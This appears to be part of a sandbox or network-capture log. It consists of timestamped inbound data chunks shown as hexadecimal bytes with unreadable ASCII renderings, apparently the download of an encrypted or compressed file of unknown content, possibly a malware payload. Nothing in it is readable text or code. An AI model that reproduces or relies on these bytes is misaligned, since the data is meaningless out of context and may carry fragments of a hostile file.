                                                                              Data Ascii: ;FDh'HJioy`Xd}n}ni/H+3LH"5h."3YDZ.eICK=.rN-GCJ Ttl\B4$i%N.R +}oT;G%fQQV8EQ
                                                                              2022-06-01 23:53:42 UTC529INData Raw: 23 31 c9 10 00 40 f9 53 ad 6a a0 fd 6a ef 8d 08 06 06 8c 8a 23 ec 65 92 89 21 61 ae d0 45 24 bc 29 c5 b1 88 7c 22 12 f2 21 e6 84 a1 c1 09 b4 ef eb 08 06 06 33 bf 0e 6a 10 8b e4 1c dd 62 db ef e0 00 05 05 b2 c1 71 7b eb 6b 14 73 bd fe 97 b6 03 69 62 e9 24 12 51 ef a8 08 06 06 5e 99 9d bd ef 6a 04 05 05 70 aa e1 7d dd 20 96 31 71 d5 4b 9e c3 46 5f ef 5c 03 05 05 4b 68 a8 5f eb ef fc fe 05 05 27 fb cc 6e 32 ed c0 26 d1 fc 60 c2 2e 91 ec ef 46 05 05 05 ef f1 52 91 fd 53 f2 2f cd b5 2e 8e 67 26 ef e3 06 06 06 c2 2a 9a e7 aa 52 67 ea ef 9e ff 05 05 d5 04 c8 3c 9c 0f f4 95 45 b9 d8 65 de b4 51 f4 f6 c4 0f ef 15 01 05 05 df 9a 08 e4 1b c3 c9 e8 7d bd a5 d9 d5 ef 3d fe 05 05 02 04 7e 46 41 5e 74 73 ab a9 78 ef 59 00 05 05 4c 56 5f 1f 34 78 5c db fa 5b c6 c0 b9 c1
                                                                              Data Ascii: #1@Sjj#e!aE$)|"!3jbq{ksib$Q^jp} 1qKF_\Kh_'n2&`.FRS/.g&*Rg<EeQ}=~FA^tsxYLV_4x\[
                                                                              2022-06-01 23:53:42 UTC545INData Raw: c2 8c d3 6b ca 83 bd f2 56 c8 2d 18 ca e7 f8 fe 0c 15 04 ef b1 02 05 05 53 ff ef 0a 82 5f ef f9 08 06 06 f7 2f af 2a 64 ef f3 f1 e5 65 51 3c 4d 1e 67 0b 9e 08 67 b6 06 f4 16 00 1d a1 fe 40 a9 7e 15 86 20 90 8b cf e5 31 ef 8e 05 05 05 07 bc 60 0c 5b c1 8a 6b 35 a1 fa c5 ef ac 09 06 06 3e 96 d3 b6 fb e4 5b c1 36 b4 4a ef d3 04 05 05 69 b6 94 96 61 b1 57 c3 36 ef a5 01 05 05 94 8c df e4 ca 17 40 21 53 b3 c6 c1 15 98 0a 42 c9 77 e2 dc b5 ef d3 03 05 05 96 7f ee 4f 70 ed 2e 08 ef cc 05 05 05 83 3b 1e 78 cb 54 4b 77 9f 3e 3d 3b 06 02 e5 35 aa 38 f7 7e 0d 28 ff 2b 7c 94 ce fe 44 58 99 2e 9b 04 d0 ef 6d 07 06 06 27 85 d3 ca 39 7e 2d 38 3c 63 7c 37 74 aa 8c 8b 46 ef 33 0a 06 06 4f e5 53 c1 9f 38 ef 06 0d 06 06 68 ce 72 34 86 25 e6 3e 2d 2a 52 cc 86 ef db 06 06 06
                                                                              Data Ascii: kV-S_/*deQ<Mgg@~ 1`[k5>[6JiaW6@!SBwOp.;xTKw>=;58~(+|DX.m'9~-8<c|7tF3OS8hr4%>-*R
                                                                              2022-06-01 23:53:42 UTC561INData Raw: 46 91 15 89 ef 85 0c 06 06 5b 7c 26 eb 0e ef 2d 0c 06 06 ef 3a a7 21 3b 4e 45 f8 bd 6d aa cf e5 5d ef 18 0d 06 06 b4 91 80 97 cc 17 3f ab ef 29 02 05 05 3c 32 33 a6 08 e8 ea aa 30 ca c6 3f 66 8b aa bf 37 7a e0 ef 9c 06 06 06 af 45 4a c2 5a 66 4a 54 77 d0 42 50 9c c4 98 b4 22 ef e4 08 06 06 d7 51 b7 14 ee 61 49 89 ef 61 09 06 06 15 4a a5 e6 f3 54 c2 f8 ca 51 39 13 77 0a 39 e6 ef fb 0c 06 06 e5 c3 1b 90 5f af 65 22 3d 6b e2 fb 1c 44 ab 77 ef 9a 0b 06 06 59 06 82 50 c0 5b 72 3a d7 03 dc 4b 72 87 9f f7 97 11 22 bf 20 28 a6 ae 10 ef 42 06 06 06 70 a0 b6 d3 d7 5d fb 0a f1 ef 67 03 05 05 d1 48 67 85 96 07 ef 3b 0c 06 06 96 8d fb 60 53 ec c7 31 a1 c2 2b 3a 47 0e 18 4d 34 9b ef 90 0a 06 06 2c d8 32 38 99 14 b0 68 8c 59 65 c2 ef 20 0c 06 06 aa 2a 75 bf 7f 47 d2 c3
                                                                              Data Ascii: F[|&-:!;NEm]?)<230?f7zEJZfJTwBP"QaIaJTQ9w9_e"=kDwYP[r:Kr" (Bp]gHg;`S1+:GM4,28hYe *uG
                                                                              2022-06-01 23:53:42 UTC577INData Raw: 2e cb e1 8e a2 93 ef e0 0d 06 06 af 1e 8b 2c c6 01 04 3a 44 a1 55 ef a9 07 06 06 11 0c 5f 14 be 79 95 20 0d ca 93 cd 92 cf 25 c9 ef 77 09 06 06 43 17 47 aa ac 3e 5b 4f c1 dc ad 47 2f ef 89 03 05 05 08 f1 78 65 cf 5e 9d b8 8b 56 b5 3f 63 82 a1 7d 2f a8 ef 07 0e 06 06 82 25 58 21 d4 70 c0 0f e6 87 8d 8c 72 06 08 d5 b5 0e 37 63 ef 8e 09 06 06 07 b2 03 14 83 78 93 1a 36 a1 8f 39 f3 94 45 a4 86 8c de 73 f6 ef 05 09 06 06 59 61 ff 90 ef 90 03 05 05 c7 9a 61 29 57 33 ae a4 b1 6b 20 92 e0 18 28 c4 ab 3a c7 83 be 89 fb b0 c1 54 2a a3 fa ef 6b 0e 06 06 80 96 c2 7d c7 a5 cc ce 6d fa 34 38 3e 0c ff 3f ef ad 06 06 06 24 77 21 00 81 9d 7b 01 17 bd c5 4b bf 7c ec 7f ef 7a 0b 06 06 e6 bf 78 82 f5 52 bf c3 ef 08 07 06 06 ed 87 d7 c2 73 54 9c 74 8b e4 09 ef 0b ea 62 ef 3f
                                                                              Data Ascii: .,:DU_y %wCG>[OG/xe^V?c}/%X!pr7cx69EsYaa)W3k (:T*k}m48>?$w!{K|zxRsTtb?
                                                                              2022-06-01 23:53:42 UTC593INData Raw: 07 c6 0a 94 07 df 67 ab 28 22 16 ec d7 ef 29 26 13 ad df 80 06 10 07 9b ef 32 01 05 05 06 41 04 f4 b7 b0 b3 cd fb 06 c3 7f 56 82 7c 6a 41 d5 0a ef 6f 26 19 b1 fa 59 84 b8 06 5e 2e 3c 6d 18 91 da 50 16 6e e7 ef b2 87 82 7d 25 0f 06 a6 22 6e 8e d8 c1 23 f9 06 8b 51 3e 96 a1 39 b5 1d 0a ef 94 d6 14 dd 26 8e 8b d1 06 c6 48 6d 26 92 b1 19 a7 0a ef 5b c6 0c f5 a3 1c 7b 51 06 ed 2b a1 fc 5a 8a eb 07 06 62 aa bb 8c 9a 34 af d2 06 21 3e 6d 15 22 52 38 ef 06 0a 08 06 06 14 92 c8 f3 06 21 76 d9 a3 dd a2 18 6e 06 73 e4 21 e4 75 25 ef 6b 07 f6 cd 36 4c bb 28 c3 8e 7a 16 22 7a ef 65 46 10 d8 e3 c6 06 08 9c c6 23 0d 87 87 3f 06 30 6d c8 0f f1 b9 50 57 26 8b b9 91 ef 17 06 0c 22 02 06 d3 45 a9 92 34 71 61 d9 0a ef 60 36 12 70 3b 5b d5 ef 08 b1 76 11 bd 27 50 ca 41 b1 0a
                                                                              Data Ascii: g(")&2AV|jAo&Y^.<mPn}%"n#Q>9&Hm&[{Q+Zb4!>m"R8!vns!u%k6L(z"zeF#?0mPW&"E4qa`6p;[v'PA
                                                                              2022-06-01 23:53:42 UTC609INData Raw: 88 88 a9 93 38 a5 6c f2 06 8e c7 48 a4 b1 a4 f3 f5 46 d8 1b d8 80 ef b9 16 1b 1e 06 d7 e5 8d f5 af 73 21 0a 06 cf ca c9 cd ad 2f e0 a3 26 30 d1 d1 ef b4 d6 12 b4 9a 06 b4 71 85 c0 04 2c 47 45 06 0d ab 75 82 95 52 b0 ef 08 f8 b6 18 f9 4f 40 8b 81 8f 0e 85 ef 7f c6 32 8f 92 14 5d 26 db ee 6f ef c5 76 07 99 f7 06 38 fd 0a 87 30 ea 01 22 06 99 a1 5c 9b f8 fd ef a6 07 f6 0e ff 8a 2b 8f d9 3f 7e 06 c0 3e 24 21 ff f9 ef c5 07 d6 0c 58 f7 e1 aa 56 46 59 06 60 17 77 74 87 69 d4 13 26 21 28 3c ef 23 96 21 da 2c 06 02 95 1d bf 33 0b 2b 7d 0a ef 9b 16 4b 54 9c 27 4b b9 06 62 e2 0c 10 75 c7 15 ef 08 97 76 14 e5 1b 01 c3 af 61 06 b9 b0 75 b7 77 b3 3d bb 07 38 13 7b f6 5e 1d 59 0b 49 06 ba c0 9a ad ee bc 96 1c 46 e6 bb 3a 6f ef 60 a6 08 a0 06 21 b1 c4 22 5a ca 48 29 26
                                                                              Data Ascii: 8lHFs!/&0q,GEuRO@2]&ov80"\+?~>$!XVFY`wti&!(<#!,3+}KT'Kbuvauw=8{^YIF:o`!"ZH)&
                                                                              2022-06-01 23:53:42 UTC625INData Raw: 88 45 a8 2d 86 45 3e f0 0e da 47 10 ca 53 66 51 d0 06 49 e6 07 13 47 60 f1 dc fa 10 47 32 0c 74 27 85 47 41 be b4 e0 ec 44 a6 bf 5c 16 60 0b 10 0a 11 06 0a 09 af 44 46 99 f4 a3 52 28 8f c8 06 07 00 87 f0 d7 00 37 e9 0b 17 45 c8 87 06 87 c8 23 d9 e2 ce 66 87 c8 e7 07 87 f0 b7 06 2e 27 68 c6 28 27 ca 8e c9 19 45 78 15 8e 40 c7 a6 35 d1 1b 45 29 07 a6 31 0e d4 2d 9b 25 48 36 06 2a 0e d5 b9 45 e0 36 0e d0 26 e0 08 44 8e cb 36 d3 0a 26 cb 59 07 f6 36 ce 26 f6 fe 8e 8c 6e 75 41 39 07 75 41 75 41 68 41 34 6f 75 41 75 41 71 41 c7 6f 22 d6 0e db a2 21 07 97 21 05 9b 21 05 99 21 57 0c 13 9e 21 07 a5 21 a3 21 a4 a5 f1 1e 26 bf f7 c9 31 1f 90 1f 78 72 09 27 42 79 40 15 bd 46 0a 43 52 10 07 ac 40 96 32 6c e1 87 f1 18 06 b9 02 bd 89 f1 07 87 c9 09 87 06 36 41 d5 37 d8
                                                                              Data Ascii: E-E>GSfQIG`G2t'GAD\`DFR(7E#f.'h('Ex@5E)1-%H6*E6&D6&Y6&nuA9uAuAhA4ouAuAqAo"!!!!W!!!&1xr'By@FCR@2l6A7
                                                                              2022-06-01 23:53:42 UTC641INData Raw: ca d4 bf 54 8a f0 ce 4f 10 79 86 08 46 75 8c e6 86 08 91 06 0e 37 c6 2f ce 37 cf 87 46 ef 03 7b 50 1b 07 46 08 2f 46 c7 37 c6 89 ee 07 87 07 33 2b c8 0a c7 49 10 8f 0e ce b0 c5 61 46 04 30 8f 89 cd 06 46 80 87 0c f5 c7 08 06 b5 c8 29 13 20 67 94 07 46 dd c7 07 d4 ad cc 8e ca 46 2d 0e 86 ea 07 47 fb 07 8e c7 26 c6 d7 0e d2 8e ac 85 67 28 cf 21 76 8e f9 26 f1 68 72 a6 70 07 22 e0 96 0e ef 36 d0 a8 3a 86 e9 aa 48 34 f5 e6 49 4a 0a 08 49 01 46 0a d1 8e 6a a4 86 c7 36 fa 05 68 0a e8 62 0e 8c f2 26 60 26 08 26 d2 8e df c6 53 46 8e cb 36 d3 26 cb 08 0d 8e 06 d6 36 ce 26 d6 86 f9 05 46 8e f7 36 df 26 f7 e7 52 36 ce f2 0e ec 28 1a 8e d5 26 56 c9 48 b1 06 6a c8 48 83 87 1a fe 47 48 84 48 48 c5 e7 07 46 48 46 45 e7 07 47 48 c7 1e 36 e6 07 1f 67 16 0e 02 e7 22 86 47
                                                                              Data Ascii: TOyFu7/7F{PF/F73+IaF0F) gFF-G&g(!v&hrp"6:H4IJIFj6hb&`&&SF6&6&F6&R6(&VHjHGHHHFHFEGH6g"G
                                                                              2022-06-01 23:53:42 UTC657INData Raw: 07 06 86 fa 07 26 e8 8e ce 3a 06 05 2a 05 26 e7 0e dc 0e 0a ce 36 32 d7 52 2e 31 bb bf 96 fe 5d ec f7 10 5e d0 9a 06 5e 0a 8c b6 06 0b 91 0e 91 8c 2a 57 86 72 91 06 09 86 0a 36 86 0a 8f 08 0e 10 6b 2f d5 37 d8 87 f0 06 38 96 91 26 07 dd 37 d8 9a 2f 00 08 74 07 06 09 87 f5 08 10 90 00 8e 70 cb 88 70 ca 8e e7 86 c8 06 8e ee 36 ce 26 ee 8e ef 07 06 0b 86 e7 07 bc 07 86 fc 06 07 26 fb 8e e8 86 f8 05 07 07 5e fa 0e ef 0e e8 36 d7 26 8e c8 26 d0 36 0c 59 63 51 5a f0 a0 10 59 29 06 59 cd 08 0b fe 66 c8 28 ae ef 1a 87 60 8f 53 87 86 f5 76 e9 36 aa 8f d0 07 b6 06 24 22 2e fb 89 f0 07 87 08 f0 07 08 87 c8 ee 61 84 c5 6a 87 c8 87 0d 87 f0 c7 08 4e 2f c9 11 ca 64 c6 57 2a 89 5e 8e e3 26 eb 26 b8 07 86 f8 07 86 2c 86 ea 0e 07 0e ee c6 2c d6 8e 8c ae 1e 07 06 06 08 6d
                                                                              Data Ascii: &:*&62R.1]^^*Wr6k/78&7/tpp6&&^6&&6YcQZY)Yf(`Sv6$".ajN/dW*^&&,,m
                                                                              2022-06-01 23:53:42 UTC673INData Raw: 2a ee 6a b1 52 66 07 ca 0a 46 76 c1 62 d8 26 01 c5 2c 8f d0 37 6b d0 1f 82 56 c8 f8 10 87 06 7b 41 e7 07 d4 93 c7 23 f8 10 c9 f8 56 86 28 18 9e 8e d3 26 0c db 88 b3 26 ac 07 0e f2 0e d6 e6 36 ca 8e 6c 77 b8 38 06 07 99 38 e6 de 26 ee 0e c8 68 35 56 88 c9 08 8f e6 20 7c 79 09 42 e6 36 ee 66 ab 6b 76 51 fb 3b 8d 0e ef 96 8b 57 23 e7 9f 46 3c fa 05 f7 b9 29 31 0e 02 26 a6 d3 e7 16 f2 97 49 8a 3e 0e f9 d7 40 b6 43 1e f1 8e cb 17 19 d7 8e 8e 7c 78 09 58 09 d8 47 26 fe 8e 4c 75 90 0a 4c 78 77 3c 76 90 4c 75 26 50 ff c7 37 76 77 3c 77 36 96 06 78 0b 67 3d 79 c7 98 d5 06 26 03 0e a6 f4 8e eb 26 e3 c6 41 eb 76 43 49 f8 4f f8 c1 26 04 8e f2 68 15 05 0b 26 08 f9 c6 38 e9 8e d2 26 da 76 36 d7 0e d2 98 3f ec 95 90 a3 ec 01 56 a1 d8 96 06 16 96 e5 96 e5 96 45 31 3f 31
                                                                              Data Ascii: *jRfFvb&,7kV{A#V(&&6lw88&h5V |yB6fkvQ;W#F<)1&I>@C|xXG&LuLxw<vLu&P7vw<w6xg=y&&AvCIO&h&8&v6?VE1?1
                                                                              2022-06-01 23:53:42 UTC689INData Raw: ec 34 33 b7 ca ef 13 ff 05 05 93 53 c7 47 17 31 b4 66 64 b8 af b8 87 1d a3 29 69 60 ae ca fd 03 c1 84 d1 ef 51 ff 05 05 74 40 46 98 80 79 bb 07 f5 a1 ff ef 02 03 05 05 d8 54 03 cd 08 0d 1e ad 3a 6e 8e f8 cb 65 b0 fe 6c ef 1b 04 05 05 af 5b 2e d1 bf 00 2b 0c 03 c2 54 0d 49 3f d7 b4 1c 03 e4 46 c1 ef db f7 05 05 9e d6 4c cd cb 7f 37 e6 bb 30 29 b2 6a e3 81 2a 41 74 78 f8 0f ed a1 d2 02 ef fc fc 05 05 25 79 9e 03 01 44 7a b4 f7 3d 83 32 8d ef 9a fd 05 05 3c 82 90 cc ef 2f fd 05 05 cd da 79 fb d0 78 f1 df cb 12 6b 92 19 20 2a 39 86 1a ab 6f ef f1 07 06 06 fa 71 f0 f3 e5 fd 70 ee 59 b2 7c 1d ca 7b 19 20 f6 ef c5 f6 05 05 1a e2 82 e2 f3 f8 a9 2f 38 d8 e7 88 53 3d ca 14 64 da 7b 35 ef e6 fe 05 05 d4 b2 8c 91 ce 32 f8 66 03 ad 54 4a 2f 47 b1 e6 bc 19 db ef 7c f5
                                                                              Data Ascii: 43SG1fd)i`Qt@FyT:nel[.+TI?FL70)j*Atx%yDz=2</yxk *9oqpY|{ /8S=d{52fTJ/G|
                                                                              2022-06-01 23:53:42 UTC705INData Raw: 07 09 1e 15 8a 23 d6 06 2c 07 a8 af ea 96 62 15 8a 82 2b 07 ef 9f f6 08 06 90 5b f8 90 53 f9 8e ce 06 3a 05 8e d9 36 c9 26 d9 06 8e dc 86 fc 05 86 ec 07 86 ba 07 86 fa 07 26 e8 87 07 06 2a 05 26 e7 0e dc 0e ce 16 36 cc 8e de 66 08 fa 86 fa 06 05 b7 07 86 f7 07 8e c8 06 86 e8 05 26 d1 8e eb 86 06 eb 05 26 d4 0e e0 0e fb 06 36 f0 0e e6 3a 05 86 cf 46 07 26 ce 0e c8 be 77 10 bf 07 37 0d fc c8 07 15 4b c7 8f 16 4b f2 ef 2d 16 0d 91 53 ee 06 56 8f e6 8f 0e 91 06 89 06 f2 0a 8f 0a 2a ee 39 04 06 0e 06 89 ca 0a 8f 4b fa 18 a7 37 1a 91 13 48 1a c8 87 f0 06 ea 12 a2 c3 87 f0 a7 ab 16 29 54 87 c8 b8 06 c8 aa 6a 1a d0 fc 47 1a f0 87 06 37 fc 87 08 f4 c7 07 2f f8 15 b5 c8 89 16 e6 07 89 fe c6 19 c6 89 ff 17 66 19 c8 8e ca 56 10 86 ea 07 06 bb 07 86 fb 07 8e c7 26 06
                                                                              Data Ascii: #,b+[S:6&&*&6f&&6:F&w7KK-SV*9K7H)TjG7/fV&
                                                                              2022-06-01 23:53:42 UTC721INData Raw: ea 05 8e 06 ee 2a 06 8e f9 86 e9 05 06 26 f5 0e ca 90 4b d9 0e 26 01 36 e2 0e f8 96 0f 86 d3 20 07 66 13 da f7 0a d9 22 06 0e e7 ce 86 d0 06 f7 21 d7 8e 26 10 e6 0c 06 c8 be 36 05 c8 01 bf 11 ce 9f 4d a6 dd 1d 6a 30 d6 1d b9 34 06 26 91 56 2a 8f d7 15 aa 26 f7 25 d7 f0 8f a6 06 4e 26 07 6f 1f fc 87 f4 2b 41 27 a8 06 8f d0 2f f8 87 f0 98 68 12 63 23 f8 2b 87 06 87 f0 a6 2d 96 f9 8c 87 f0 e7 07 87 c8 b7 06 19 54 20 08 2a 2a 07 28 1c 8e df 26 0a d7 0e 56 1f d6 8e fd 86 fd 8e 05 86 ed aa 21 fa 26 da af 21 30 ed a6 21 d5 2a 1f 07 8a 07 07 0e a8 d0 f9 2d cb 36 d3 39 1f d7 f6 13 2b 38 1f d1 3a 1f 8e ff 16 07 ba 07 6e 86 fa 07 68 07 e7 66 07 16 16 c7 4f 17 1e d6 3a 88 07 06 0e 66 20 d6 5e 86 d2 06 36 07 ce 20 d3 c6 20 f7 4a 0e d3 c9 20 ef 26 f7 c9 20 e7 26 8e 53
                                                                              Data Ascii: *&K&6 f"!&6Mj04&V*&%N&o+A'/hc#+-T **(&V!&!0!*-69+8:nhfO:f ^6 J & &S
                                                                              2022-06-01 23:53:42 UTC737INData Raw: 36 f0 26 c8 8e e3 06 86 fb 05 8e d4 36 f4 26 08 d4 59 07 ff 36 ef 26 ff 86 06 f9 05 8e eb 36 e3 26 eb 06 8e da 26 fa 36 f8 0e da 06 8e d0 26 f0 36 ef 0e d0 22 8e e9 a6 07 e6 0a b8 08 26 f2 8e 06 d7 86 f7 05 86 e7 05 26 06 f0 0e e9 0e d7 36 d1 8e 46 c8 86 f8 05 8e 03 26 0b ba 16 07 86 fa 06 e6 07 e7 06 26 06 e6 8e f4 86 ec 06 26 ed 06 0e c7 90 4b d5 0e 04 36 0e f7 0e f0 56 08 86 d2 06 26 06 e8 0e d7 8e d4 86 fc 05 0a 86 ec f9 0f 26 d7 0e d4 8e 06 c7 86 e7 07 3a 07 0e c7 07 77 07 f7 05 b6 07 3a 06 0e 0e d4 12 06 d6 06 26 cc 8e de 06 3a 05 8e fa 86 fa 05 b7 1e 07 86 f7 06 12 86 14 26 d1 8e 06 eb 86 eb 05 26 d4 0e e0 06 0e fb 36 f0 0e e6 3a 05 06 86 cf 07 26 ce 0e c8 be 06 a0 e0 e2 f0 bf 69 48 0a 06 b8 fc c8 07 15 4b c7 8f 06 4b da ef 0a 2d 06 06 cd 06 4b da
                                                                              Data Ascii: 6&6&Y6&6&&6&6"&&6F&&&K6V&&:w:&:&&6:&iHKK-K
                                                                              2022-06-01 23:53:42 UTC753INData Raw: 07 87 08 cc 07 16 8f d0 87 c8 23 aa 46 d7 69 07 f8 87 f0 07 14 15 06 b5 d0 89 e7 07 89 ff 06 06 15 9a c8 89 fe 10 15 a2 0e c7 8e ce 06 88 d9 36 c9 26 06 d9 8e dc 86 fc 05 86 ec 06 06 ba 07 86 fa 06 26 e8 a7 07 1e 2a 06 26 e7 16 af 06 07 af 30 06 09 af 06 11 af 06 08 af d2 19 86 34 7a bf 58 90 a6 5f 0d af 08 16 06 af 89 f2 0a cd 0a 2a 06 08 06 06 06 ee 12 bd ff 86 05 8f 0a 2a ee 3a 22 06 11 06 ca 0a 91 53 de 91 0f 91 06 5b e2 91 18 91 7b e6 91 06 3c 91 83 ea 91 45 91 63 46 ee 91 21 89 f2 1e 07 1f 07 06 06 06 8f 62 2a 0a 8f 82 06 2a 0e 8f 7a 2a 12 8f 5a 06 2a 16 8f 52 2a 1a 05 d6 46 89 fe 06 15 a3 c6 86 4d f8 16 05 86 e8 07 07 63 07 8e c7 87 06 60 d0 b9 07 86 f9 07 86 10 cf 88 5d 0e d9 86 52 86 f9 06 b4 08 ba 56 86 e7 07 b8 86 13 07 86 1e 0e 06 d7 86 f7 05
                                                                              Data Ascii: #Fi6&&*&04zX_**:"S[{<EcF!b**z*Z*R*FMc`]RV
                                                                              2022-06-01 23:53:42 UTC769INData Raw: 48 88 e8 09 05 d6 91 9b a7 0f 91 aa 93 7a 67 10 cc 91 e8 0b 37 26 0c 06 1e 8f 3a 2a 8f 5a 2a 0a 16 cd 4a 2a 0e 67 12 8f 52 2a 88 12 66 07 16 06 36 06 06 e6 06 30 1a 46 b6 06 a7 0d 82 a7 0d 53 86 16 91 4b 8a cd 07 16 06 91 0f 06 8f 0e cd 4b c2 ff cc 99 0e f2 ef 8b 46 14 91 4b e6 91 8a 4b d6 26 08 6e 20 eb af 68 92 26 91 4b da 91 0e c7 08 16 37 06 c6 33 03 34 66 c7 07 c7 06 37 c6 2f ce 37 cf 2f d7 08 07 a7 06 c7 87 ef a9 12 2b 4e c8 87 c7 67 09 87 c7 67 07 91 0e 4b ea 8f 46 0c de 91 16 91 16 4b e2 91 0e e6 0c 26 f9 f5 16 bd 2f d6 0b c7 06 37 d8 87 06 f0 0a f7 f9 97 2f d0 87 34 c8 e7 06 47 0e 06 10 d6 c9 10 bf 67 c6 ff 29 f6 89 c7 06 c7 10 47 07 0e 91 4b ee 47 0f d2 91 06 91 06 53 ea 91 0f 91 5b ee 91 86 18 89 f2 12 8f 1a 2a 26 22 8a 0a 8f a6 23 ee 7b de fd
                                                                              Data Ascii: Hzg7&:*Z*J*gR*f60FSKKFKK&n h&K734f7/7/+NggKFK&/7/4Gg)GKGS[*&"#{
                                                                              2022-06-01 23:53:42 UTC785INData Raw: 9f 2e b3 98 e3 73 31 40 2b dc ef be 01 05 05 39 56 c3 9a 9f 13 a1 c2 84 f3 63 23 e1 eb c7 b1 72 6c dd f5 03 49 ef 46 04 05 05 a1 c5 4c bb 51 ee d3 fa 4f 2b c9 d5 61 5a ba 8d ef 2e fe 05 05 28 3d d3 d2 65 c7 8f 64 6f 2b f9 cf 52 a8 7a 88 e8 b0 c2 81 5e ef 44 02 05 05 b6 fa 9f 4c 19 ee 8c 7d b1 81 32 47 cd d9 c7 f5 dc 1e 5c 0e 34 75 ef 48 08 06 06 a4 1a d3 62 a2 19 60 40 0f df 29 55 cc 62 26 49 28 2e c4 f9 99 40 0a 00 d3 2b 9a db da 83 78 c1 f8 af e6 ef 03 0b 06 06 17 76 40 55 e7 1d ef 0f 09 06 06 31 9e cf 6b ef bb fe 05 05 af 0d f3 24 46 d2 1a 2a a0 8a a1 60 db 15 3a 12 5f ef dc ef 9c 04 05 05 49 ac b8 12 1e ac 95 ae eb 82 d3 d7 ef cf 05 05 05 5d 84 e6 fc 29 2a 81 5b 0f dc c7 bf bf ef f3 06 06 06 5f 58 6d fc 07 9f ce a6 a3 ed f9 92 0b 7e e1 d3 e2 a2 d5 c2
                                                                              Data Ascii: .s1@+9Vc#rlIFLQO+aZ.(=edo+Rz^DL}2G\4uHb`@)Ub&I(.@+xv@U1k$F*`:_I])*[_Xm~
                                                                              2022-06-01 23:53:42 UTC801INData Raw: 16 7f 08 18 d9 70 39 00 0a 0a 06 06 89 f2 0a cd 0a 2a 07 06 06 06 06 ee 9a b8 fe 05 46 8f 0a 2a ee 02 15 c6 08 ca de 0a 05 d6 27 31 09 8a 61 11 8a 47 36 76 ce b1 8a d2 a8 b8 07 07 27 8c 4e fe 49 c4 36 07 8a e7 06 c5 b8 c5 b8 b0 b8 a7 08 1e ce 39 bb 19 10 1e 3f 06 1e 7c cd 48 07 c7 50 90 c8 1a c7 1b 47 50 ef e0 22 86 09 90 48 07 47 08 9e 33 1e 66 1d 8a 89 cd 48 a3 06 d5 52 8f 07 1d 61 e7 06 54 b9 ca 07 40 66 64 fb 0a 1d ee cb 0b 1d db 87 43 e7 26 ef a6 34 c8 52 07 2b 1b 2d ad 44 d9 bf 39 b7 6a e3 9d 30 1b 95 09 d0 c9 c7 14 54 06 7b 9f 00 87 f0 6d 5f d6 1e 04 87 c8 67 07 2b b2 f0 86 de f6 d6 bc 87 c8 09 09 67 07 85 18 85 18 27 66 18 46 bb cd cf 70 18 01 08 09 47 79 07 29 be e3 80 43 18 bf d6 ae 2e c0 5f 10 0a e0 06 0a 6e 78 c9 6c 2c 66 79 bc df e1 aa 67 1b
                                                                              Data Ascii: p9*F*'1aG6v'NI69?|HPGP"HG3fHRaT@fdC&4R+-D9j0T{m_g+g'fFpGy)C._nxl,fyg
                                                                              2022-06-01 23:53:42 UTC817INData Raw: 9f 09 06 90 9c 69 2c 06 06 06 be a8 4e 2a 59 bf ec 8e 93 f2 28 0f 26 cc 8c 48 06 0b 0e 07 ef 70 06 2d 91 13 aa c4 16 5e 06 a7 ae 06 08 37 d8 87 06 f0 3c b1 26 f4 89 f0 07 0a 87 c8 07 0a 37 05 2f dd 8f 06 d0 2f 00 15 b5 d0 89 e7 06 07 89 ff 06 15 9a cb 89 86 fe 10 15 a2 ca 8e e7 87 98 2e ee 36 ce 06 8a ef 06 0b 86 e7 0a 07 bc 86 a4 07 26 fb 8e e8 07 88 6c 05 26 fa 0e ef 0e e8 08 36 0d 5b 17 9f 5c c5 bf 55 0e 8f 1a ca 10 5b ed 9e 09 06 06 89 f2 0a cd 0a 2a 07 06 06 06 06 ee 87 4c fe 05 8f 06 0a 2a ee 4f b5 01 05 89 66 ca 0a 91 94 76 06 18 86 15 8f 06 12 2a 05 d6 89 fe 06 15 86 9b c6 2a 07 8e 8c 6a 06 73 18 a7 87 61 91 13 07 62 c5 36 1e 06 89 d1 89 cd 06 89 f5 07 0a 87 f5 87 0b 8f c8 87 f0 f4 86 81 c6 19 07 00 87 c8 87 09 46 15 b5 c8 89 e6 07 87 25 9a 8e c6
                                                                              Data Ascii: i,N*Y(&Hp-^7<&7//.6&l&6[\U[*L*Ofv**jsab6F%
                                                                              2022-06-01 23:53:42 UTC833INData Raw: f2 f5 fa 30 76 35 d6 79 f9 30 00 16 0e 87 76 a9 0a 52 0e e0 36 41 16 07 26 e8 e7 1d fb 63 da 40 f4 77 40 76 8e 20 7a 39 1a 7a 07 3b 17 7a 05 17 7a 36 38 79 77 07 2a 05 fe 8e 8c 37 d8 06 37 07 19 7a f7 06 87 47 c5 77 0f 17 7a 77 08 17 7a e7 14 18 7a 07 25 7a 5b 1f 7a 3b 24 7a 07 97 40 05 19 7a 05 fd 79 40 47 08 7e 40 07 25 7a 25 7a 20 7a c8 28 96 a4 67 ae be d0 28 55 34 20 7a 0c 46 e6 06 7e 6c 8f c8 87 f0 ec 06 08 06 20 87 f0 df bc 08 1e a8 87 c8 b7 06 4a c4 87 c8 d3 a6 b0 84 99 87 c8 88 07 f0 b7 06 df c5 6d 8e c9 1b 7a b9 4a e9 b7 4a 36 7a 24 d9 a5 6e 75 35 75 35 6b 35 ec 21 4b 46 75 bf 87 78 3c 47 a0 12 8b c8 33 04 40 f1 4d fa cb f7 40 2b 11 86 f0 17 54 9e 6e 87 f0 67 07 92 87 c8 b7 06 94 6b ca 8e ee 96 0e a1 67 1b a9 4a d6 ab 4a e8 b4 e7 06 c7 9d 4e 06
                                                                              Data Ascii: 0v5y0vR6A&c@w@v z9z;zz68yw*77zGwzwzz%z[z;$z@zy@G~@%z%z z(g(U4 zF~l JmzJJ6z$nu5u5k5!KFux<G3@M@+TngkgJJN
